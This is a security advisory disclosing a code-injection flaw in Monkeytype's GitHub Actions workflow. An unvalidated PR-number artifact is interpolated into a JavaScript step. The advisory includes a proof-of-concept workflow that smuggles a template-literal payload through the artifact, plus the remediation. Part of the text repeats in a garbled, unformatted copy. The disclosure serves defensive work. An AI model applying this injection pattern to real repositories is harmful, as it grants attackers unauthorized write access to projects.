Summary
Monkeytype is vulnerable to Poisoned Pipeline Execution through Code Injection in its ci-failure-comment.yml GitHub Workflow, enabling attackers to gain pull-requests write access.
Details
Code Injection in ci-failure-comment.yml (GHSL-2024-167)
The ci-failure-comment.yml workflow is triggered when the Monkey CI workflow completes:
on:
workflow_run:
workflows: [Monkey CI]
types: [completed]When it runs, it will download an artifact uploaded by the triggering workflow and assign the contents of ./pr_num/pr_num.txt artifact to the steps.pr_num_reader.outputs.content WorkFlow variable:
- name: Download workflow artifact
uses: dawidd6/action-download-artifact@v2.11.0
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
workflow: peek_icons.yml
run_id: ${{ github.event.workflow_run.id }}
- name: Read the pr_num file
id: pr_num_reader
uses: juliangruber/read-file-action@v1.0.0
with:
path: ./pr_num/pr_num.txtIt is not validated that the variable is actually a number and later it is interpolated into a JS script allowing an attacker to change the code to be executed:
- name: Create comment
uses: actions/github-script@v6
with:
github-token: ${{ secrets.API_TOKEN }}
script: |
github.rest.issues.createComment({
issue_number: ${{ steps.pr_num_reader.outputs.content }},
owner: context.repo.owner,
repo: context.repo.repo,
body: 'Continuous integration check(s) failed. Please review the failing check\'s logs and make the necessary changes. ' + context.payload.workflow_run.html_url
})Proof Of Concept
- Fork the repo.
- Create a new branch.
- Modify the contents of
.github/workflows/monkey-ci.yml to:
name: Monkey CI
on:
pull_request:
jobs:
exploit:
permissions: write-all
runs-on: ubuntu-latest
steps:
- name: Write exploit to artifact
shell: bash
run: echo '`${console.log('PWNED')}`' > pr_num.txt
- name: Upload the exploit
uses: actions/upload-artifact@v3
with:
name: pr_num
path: ./pr_num.txt
- Create a Pull request with this change to the master branch of monkeytype.
- The modified workflow will trigger and will upload an artifact with the exploit which will trigger the second workflow which will download it and interpolate it into the JS script.
Impact
This issue leads to pull-requests write access.
Remediation
Pass the contents of steps.pr_num_reader.outputs.content variable through an environment variable.
Resources
pwntester Reporter
Summary
Monkeytype is vulnerable to Poisoned Pipeline Execution through Code Injection in its
ci-failure-comment.ymlGitHub Workflow, enabling attackers to gainpull-requestswrite access.Details
Code Injection in
ci-failure-comment.yml(GHSL-2024-167)The
ci-failure-comment.ymlworkflow is triggered when theMonkey CIworkflow completes:When it runs, it will download an artifact uploaded by the triggering workflow and assign the contents of
./pr_num/pr_num.txtartifact to thesteps.pr_num_reader.outputs.contentWorkFlow variable:It is not validated that the variable is actually a number and later it is interpolated into a JS script allowing an attacker to change the code to be executed:
Proof Of Concept
.github/workflows/monkey-ci.ymlto:Impact
This issue leads to
pull-requestswrite access.Remediation
Pass the contents of
steps.pr_num_reader.outputs.contentvariable through an environment variable.Resources